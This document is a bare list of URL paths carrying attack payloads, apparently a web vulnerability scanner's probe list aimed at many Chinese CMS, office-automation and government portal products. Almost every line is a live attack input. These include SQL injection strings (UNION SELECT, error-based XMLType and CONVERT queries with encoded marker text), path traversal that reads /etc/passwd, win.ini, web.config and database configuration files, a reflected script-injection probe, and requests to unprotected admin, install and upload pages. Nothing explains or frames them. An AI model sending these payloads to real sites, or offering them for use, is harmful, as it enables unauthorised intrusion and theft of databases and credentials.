/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
